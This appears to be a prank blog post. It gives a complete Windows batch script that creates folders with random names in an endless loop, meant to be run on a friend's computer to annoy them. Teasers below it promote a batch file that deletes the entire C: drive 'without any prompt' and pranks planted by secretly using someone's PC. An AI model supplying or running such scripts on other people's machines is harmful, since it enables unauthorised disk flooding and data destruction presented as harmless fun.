Skip to main content

Thousand folders in few seconds



 Just with your note pad.

You can use this to annoy friends ashe’ll have to delete them or you can use for your benefit also!


So here it goes….
 

Open notepad and type 

@echo off
:top
md %random%
goto top
Explanation:
@echo off – makes it so that it
appears
to be a blank screen but actually its
making hundreds of folder.
md %random% is command that
creating folders with random
names.
goto top – return to label
 :top-infinite loop

Save it as ” 1000folders.bat
” ( excluding inverted commas )
You have just created what you desired.Have fun.
For more such posts visit http://thetechzworld.blogspot.in/

Popular posts from this blog

BATCH FILE TO DELETE C: DRIVE | Delete C Drive cmd

More in the notepad tricks,here is a batch file program to delete an entire drive form the computer. Yes, you heard it right. Notepad is your biggest tool to put your evil efforts to make your friends cry. This short trick to wipe and Delete C Drive has a small code that has the power to delete your hard drive without any prompt. This chunk of code is really helpful if you want to crash and format a hard drive. LEARN HOW TO DELETE AN ENTIRE DRIVE FROM YOUR COMPUTER

Top 10 Most Annoying Computer Pranks in 2018

Here are some most FUNNY,ANNONYING computer pranks Is there someone who irritates you regularly and you can't beat them up..Dont't worry here is how you can take your #revenge :) you just need to sneak in there PC's for two minutes and it will do the magic. Create a Shutdown Shortcut that Looks like a Folder